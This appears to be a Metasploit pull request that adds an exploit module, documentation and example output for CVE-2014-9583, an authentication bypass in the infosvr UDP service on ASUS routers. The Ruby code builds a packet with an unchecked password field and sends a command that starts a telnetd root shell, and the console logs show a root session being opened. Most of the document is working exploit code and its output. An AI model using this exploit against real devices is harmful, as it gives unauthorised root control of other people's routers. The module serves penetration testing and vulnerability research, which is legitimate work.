### PR TITLE
Add ASUS infosvr Auth Bypass Command Execution exploit

### DIFF
--- a/documentation/modules/exploit/linux/misc/asus_infosvr_auth_bypass_exec.md
+++ b/documentation/modules/exploit/linux/misc/asus_infosvr_auth_bypass_exec.md
@@ -1,0 +1,78 @@
+## Description
+
+  This module exploits an authentication bypass vulnerability in the infosvr service running on various ASUS routers to execute arbitrary commands as `root`.
+
+
+## Vulnerable Application
+
+  The ASUS infosvr service is enabled by default on various models of ASUS routers and listens on the LAN interface on UDP port 9999. Unpatched versions of this service allow unauthenticated remote command execution as the `root` user.
+
+  This module launches the BusyBox Telnet daemon on the port specified in the `TelnetPort` option to gain an interactive remote shell.
+
+  This module was tested successfully on an ASUS RT-N12E with firmware version 2.0.0.35.
+
+  Numerous ASUS models are [reportedly affected](https://github.com/jduck/asus-cmd), but untested.
+
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. `use exploit/linux/misc/asus_infosvr_auth_bypass_exec`
+  3. `set RHOST [IP]`
+  4. `run`
+  5. You should get a *root* session
+
+
+## Options
+
+
+  **TelnetPort**
+
+  The port for Telnetd to bind (default: `4444`)
+
+  **TelnetTimeout**
+
+  The number of seconds to wait for connection to telnet (default: `10`)
+
+  **TelnetBannerTimeout**
+
+  The number of seconds to wait for the telnet banner (default: `25`)
+
+  **CommandShellCleanupCommand**
+
+  A command to run before the session is closed (default: `exit`)
+
+  If the session is killed (CTRL+C) rather than exiting cleanly,
+  the telnet port remains open, but is unresponsive, and prevents
+  re-exploitation until the device is rebooted.
+
+
+## Scenarios
+
+  ```
+  msf > use exploit/linux/misc/asus_infosvr_auth_bypass_exec
+  msf exploit(linux/misc/asus_infosvr_auth_bypass_exec) > set rhost 10.1.1.1
+  rhost => 10.1.1.1
+  msf exploit(linux/misc/asus_infosvr_auth_bypass_exec) > set telnetport 4444
+  telnetport => 4444
+  msf exploit(linux/misc/asus_infosvr_auth_bypass_exec) > set verbose true
+  verbose => true
+  msf exploit(linux/misc/asus_infosvr_auth_bypass_exec) > run 
+
+  [*] 10.1.1.1 - Starting telnetd on port 4444...
+  [*] 10.1.1.1 - Waiting for telnet service to start on port 4444...
+  [*] 10.1.1.1 - Connecting to 10.1.1.1:4444...
+  [*] 10.1.1.1 - Trying to establish a telnet session...
+  [+] 10.1.1.1 - Telnet session successfully established...
+  [*] Found shell.
+  [*] Command shell session 1 opened (10.1.1.197:42875 -> 10.1.1.1:4444) at 2017-11-28 07:38:37 -0500
+
+  id
+  /bin/sh: id: not found
+  # cat /proc/version
+  cat /proc/version
+  Linux version 2.6.30.9 (root@wireless-desktop) (gcc version 3.4.6-1.3.6) #2 Thu Sep 18 18:12:23 CST 2014
+  # exit
+  exit
+  ```
+

--- a/modules/exploits/linux/misc/asus_infosvr_auth_bypass_exec.rb
+++ b/modules/exploits/linux/misc/asus_infosvr_auth_bypass_exec.rb
@@ -56,6 +56,12 @@ class MetasploitModule < Msf::Exploit::Remote
       OptInt.new('TelnetTimeout', [true, 'The number of seconds to wait for connection to telnet', 10]),
       OptInt.new('TelnetBannerTimeout', [true, 'The number of seconds to wait for the telnet banner', 25])
     ]
+    register_advanced_options [
+      # If the session is killed (CTRL+C) rather than exiting cleanly,
+      # the telnet port remains open, but is unresponsive, and prevents
+      # re-exploitation until the device is rebooted.
+      OptString.new('CommandShellCleanupCommand', [true, 'A command to run before the session is closed', 'exit'])
+    ]
   end
 
   def telnet_timeout

--- a/modules/exploits/linux/misc/asus_infosvr_auth_bypass_exec.rb
+++ b/modules/exploits/linux/misc/asus_infosvr_auth_bypass_exec.rb
@@ -10,15 +10,18 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'        => 'ASUS infosvr Unauthenticated Command Execution',
+      'Name'        => 'ASUS infosvr Auth Bypass Command Execution',
       'Description' => %q{
-        This module exploits an unauthenticated remote command execution
-        vulnerability in the infosvr service running on UDP port 9999 on
-        various ASUS routers.
+        This module exploits an authentication bypass vulnerability in the
+        infosvr service running on UDP port 9999 on various ASUS routers to
+        execute arbitrary commands as root.
+
         This module launches the BusyBox Telnet daemon on the port specified
         in the TelnetPort option to gain an interactive remote shell.
+
         This module was tested successfully on an ASUS RT-N12E with firmware
         version 2.0.0.35.
+
         Numerous ASUS models are reportedly affected, but untested.
       },
       'Author'      =>
@@ -45,10 +48,7 @@ class MetasploitModule < Msf::Exploit::Remote
             'ConnectionType' => 'find'
           }
         },
-      'Targets'        =>
-        [
-          ['Automatic', {}]
-        ],
+      'Targets'        => [['Automatic', {}]],
       'DefaultTarget'  => 0))
     register_options [
       Opt::RPORT(9999),

--- a/modules/exploits/linux/misc/asus_infosvr_exec.rb
+++ b/modules/exploits/linux/misc/asus_infosvr_exec.rb
@@ -1,0 +1,135 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::Udp
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'ASUS infosvr Unauthenticated Command Execution',
+      'Description' => %q{
+        This module exploits an unauthenticated remote command execution
+        vulnerability in the infosvr service running on UDP port 9999 on
+        various ASUS routers.
+        This module launches the BusyBox Telnet daemon on the port specified
+        in the TelnetPort option to gain an interactive remote shell.
+        This module was tested successfully on an ASUS RT-N12E with firmware
+        version 2.0.0.35.
+        Numerous ASUS models are reportedly affected, but untested.
+      },
+      'Author'      =>
+        [
+          'Friedrich Postelstorfer', # Initial public disclosure and Python exploit
+          'jduck', # Independent discovery and C exploit
+          'Brendan Coles <bcoles[at]gmail.com>' # Metasploit
+        ],
+      'License'     => MSF_LICENSE,
+      'Platform'    => 'unix',
+      'References'  =>
+        [
+          ['CVE', '2014-9583'],
+          ['EDB', '35688'],
+          ['URL', 'https://github.com/jduck/asus-cmd']
+        ],
+      'DisclosureDate' => 'Jan 4 2015',
+      'Privileged'     => true,
+      'Arch'           => ARCH_CMD,
+      'Payload'        =>
+        {
+          'Compat' => {
+            'PayloadType'    => 'cmd_interact',
+            'ConnectionType' => 'find'
+          }
+        },
+      'Targets'        =>
+        [
+          ['Automatic', {}]
+        ],
+      'DefaultTarget'  => 0))
+    register_options [
+      Opt::RPORT(9999),
+      OptInt.new('TelnetPort', [true, 'The port for Telnetd to bind', 4444]),
+      OptInt.new('TelnetTimeout', [true, 'The number of seconds to wait for connection to telnet', 10]),
+      OptInt.new('TelnetBannerTimeout', [true, 'The number of seconds to wait for the telnet banner', 25])
+    ]
+  end
+
+  def telnet_timeout
+    (datastore['TelnetTimeout'] || 10)
+  end
+
+  def telnet_port
+    datastore['TelnetPort']
+  end
+
+  def request(cmd)
+    pkt = ''
+    # ServiceID   [byte]      ; NET_SERVICE_ID_IBOX_INFO
+    pkt << "\x0C"
+    # PacketType  [byte]      ; NET_PACKET_TYPE_CMD
+    pkt << "\x15"
+    # OpCode      [word]      ; NET_CMD_ID_MANU_CMD
+    pkt << "\x33\x00"
+    # Info        [dword]     ; Comment: "Or Transaction ID"
+    pkt << Rex::Text.rand_text_alphanumeric(4)
+    # MacAddress  [byte[6]]   ; Double-wrongly "checked" with memcpy instead of memcmp
+    pkt << Rex::Text.rand_text_alphanumeric(6)
+    # Password    [byte[32]]  ; Not checked at all
+    pkt << "\x00" * 32
+    # Command Length + \x00 + Command padded to 512 bytes
+    pkt << ([cmd.length].pack('C') + "\x00" + cmd).ljust((512 - pkt.length), "\x00")
+  end
+
+  def exploit
+    connect_udp
+    print_status "#{rhost} - Starting telnetd on port #{telnet_port}..."
+    udp_sock.put request "telnetd -l /bin/sh -p #{telnet_port}"
+    disconnect_udp
+
+    vprint_status "#{rhost} - Waiting for telnet service to start on port #{telnet_port}..."
+    Rex.sleep 3
+
+    vprint_status "#{rhost} - Connecting to #{rhost}:#{telnet_port}..."
+
+    sock = Rex::Socket.create_tcp 'PeerHost' => rhost,
+                                  'PeerPort' => telnet_port,
+                                  'Context'  => { 'Msf' => framework, 'MsfExploit' => self },
+                                  'Timeout'  => telnet_timeout
+
+    if sock.nil?
+      fail_with Failure::Unreachable, "Telnet service unreachable on port #{telnet_port}"
+    end
+
+    vprint_status "#{rhost} - Trying to establish a telnet session..."
+
+    prompt = negotiate_telnet sock
+    if prompt.nil?
+      sock.close
+      fail_with Failure::Unknown, 'Unable to establish a telnet session'
+    end
+
+    print_good "#{rhost} - Telnet session successfully established..."
+
+    handler sock
+  end
+
+  def negotiate_telnet(sock)
+    prompt = '#'
+    Timeout.timeout(datastore['TelnetBannerTimeout']) do
+      while true
+        data = sock.get_once(-1, telnet_timeout)
+        if !data or data.length == 0
+          return nil
+        elsif data.include? prompt
+          return true
+        end
+      end
+    end
+  rescue ::Timeout::Error
+    return nil
+  end
+end


### PR DESCRIPTION
This PR adds an ASUS infosvr Unauthenticated Command Execution exploit (CVE-2014-9583).

```
        This module exploits an unauthenticated remote command execution
        vulnerability in the infosvr service running on UDP port 9999 on
        various ASUS routers.

        This module launches the BusyBox Telnet daemon on the port specified
        in the TelnetPort option to gain an interactive remote shell.

        This module was tested successfully on an ASUS RT-N12E with firmware
        version 2.0.0.35.

        Numerous ASUS models are reportedly affected, but untested.
```

### Example Output

```
msf > use exploit/linux/misc/asus_infosvr_exec 
msf exploit(asus_infosvr_exec) > set rhost 10.1.1.1
rhost => 10.1.1.1
msf exploit(asus_infosvr_exec) > set telnetport 4444
telnetport => 4444
msf exploit(asus_infosvr_exec) > set verbose true
verbose => true
msf exploit(asus_infosvr_exec) > run 

[*] 10.1.1.1 - Starting telnetd on port 4444...
[*] 10.1.1.1 - Waiting for telnet service to start on port 4444...
[*] 10.1.1.1 - Connecting to 10.1.1.1:4444...
[*] 10.1.1.1 - Trying to establish a telnet session...
[+] 10.1.1.1 - Telnet session successfully established...
[*] Found shell.
[*] Command shell session 1 opened (10.1.1.197:42875 -> 10.1.1.1:4444) at 2017-11-28 07:38:37 -0500

id
/bin/sh: id: not found
# cat /proc/version
cat /proc/version
Linux version 2.6.30.9 (root@wireless-desktop) (gcc version 3.4.6-1.3.6) #2 Thu Sep 18 18:12:23 CST 2014
# exit
exit
```
